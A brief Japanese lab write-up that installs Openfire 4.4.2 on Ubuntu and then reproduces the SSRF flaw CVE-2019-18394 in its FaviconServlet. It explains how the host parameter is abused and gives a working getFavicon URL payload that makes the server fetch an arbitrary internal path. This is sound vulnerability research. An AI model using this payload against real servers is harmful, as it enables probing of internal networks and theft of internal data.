Openfireのインストール
77@ubuntu129:~/repos$ wget https://github.com/igniterealtime/Openfire/releases/download/v4.4.2/openfire_4.4.2_all.deb
77@ubuntu129:~/repos$ sudo dpkg -i openfire_4.4.2_all.deb
Selecting previously unselected package openfire.
(Reading database ... 332004 files and directories currently installed.)
Preparing to unpack openfire_4.4.2_all.deb ...
Unpacking openfire (4.4.2) ...
Setting up openfire (4.4.2) ...
adduser: Warning: The home directory `/var/lib/openfire' does not belong to the user you are currently creating.
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
77@ubuntu129:~/repos$ sudo systemctl start openfire.service
77@ubuntu129:~/repos$ tcp|grep 9090
tcp6 0 0 :::9090 :::* LISTEN 28190/java
引き続きWEBインターフェイスにインストールします。
参照:
- https://www.vultr.com/docs/how-to-setup-an-openfire-xmpp-server-on-ubuntu-16-04-lts
- https://computingforgeeks.com/install-openfire-xmpp-chat-server-on-ubuntu-linux/
インストールが完了したら、次のインターフェイスに入ります。
SSRF:CVE-2019-18394
/ getFaviconはFaviconServletクラスに対応します。
このクラスを入力し、ユーザーのホストパラメーターに従ってdoGetメソッドでhttp要求を行います。
xmppserver / src / main / java / org / jivesoftware / util / FaviconServlet.java
以下/favicon.ico
は?、後者を要求パラメーターとして説明するために使用できるため、任意のパスに対して要求が発生します。
http://192.168.85.129:9090/getFavicon?host=192.168.85.129:4444/secrets.txt?a=
参照
- https://swarm.ptsecurity.com/openfire-admin-console/